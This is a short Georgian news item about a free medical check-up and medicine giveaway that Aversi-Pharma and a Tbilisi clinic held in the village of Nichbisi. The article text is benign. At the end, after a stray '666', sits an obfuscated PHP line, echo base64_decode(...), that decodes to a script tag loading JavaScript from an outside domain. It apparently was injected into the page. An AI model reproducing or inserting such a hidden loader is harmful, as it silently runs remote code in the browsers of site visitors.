celsiusi
ავერსი საქკაბელი
„ავერსი-ფარმა“ და „აკადემიკოს ვახტანგ ბოჭორიშვილის კლინიკა“ ტრადიციად ქცეულ საქველმოქმედო აქციებს აგრძელებს. 
 
როგორც საინფორმაციო სააგენტო BUSINESS TIME-ს „ავერსი“–დან აცნობეს, 29 აპრილს ,,აკადემიკოს ვახტანგ ბოჭორიშვილის კლინიკის“ ექიმებისა და ,,ავერსი ფარმას” ორგანიზებით  უფასო გამოკვლევა-გასინჯვა მცხეთის მუნიციპალიტეტის   სოფელ ნიჩბისში ჩატარდა. 
 
,,აკადემიკოს ვახტანგ ბოჭორიშვილის კლინიკის“ ექიმებმა, სოფელ ნიჩბისის  მოსახლეობას გაუწიეს თერაპიული, ქირურგიული, პედიატრიული,  კარდიოლოგიური,  გინეკოლოგიური, ტრავმატოლოგიური, ინფექციური და ნევროლოგიური კონსულტაციები, ასევე აქციაზე მოსულ მოსახლეობას ჩაუტარდათ ექოსკოპიური, კარდიოგრაფიული და ლაბორატორიული გამოკვლევები.
 
„ავერსი-ფარმამ“ აქციის ყველა მონაწილეს, ტრადიციისამებრ, უფასოდ გადასცა პირველადი დახმარების 12 დასახელების მედიკამენტი.
 
 
„ავერსი“ თითოეული მოქალაქის ჯანმრთელობაზე ზრუნავს, განსაკუთრებით კი მათზე, ვისთვისაც მაღალი დონის სამედიცინო მომსახურება მიუწვდომელია. ამ ტიპის აქციები „აკადემიკოს ვახტანგ ბოჭორიშვილის კლინიკის“ მიერ,  გარდა სოფელ ნიჩბისისა, გაიმართა ქვემო ქართლის, შიდა ქართლის და კახეთის რეგიონის სოფლებში."–განმარტავენ კომპანიაში. 
666
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");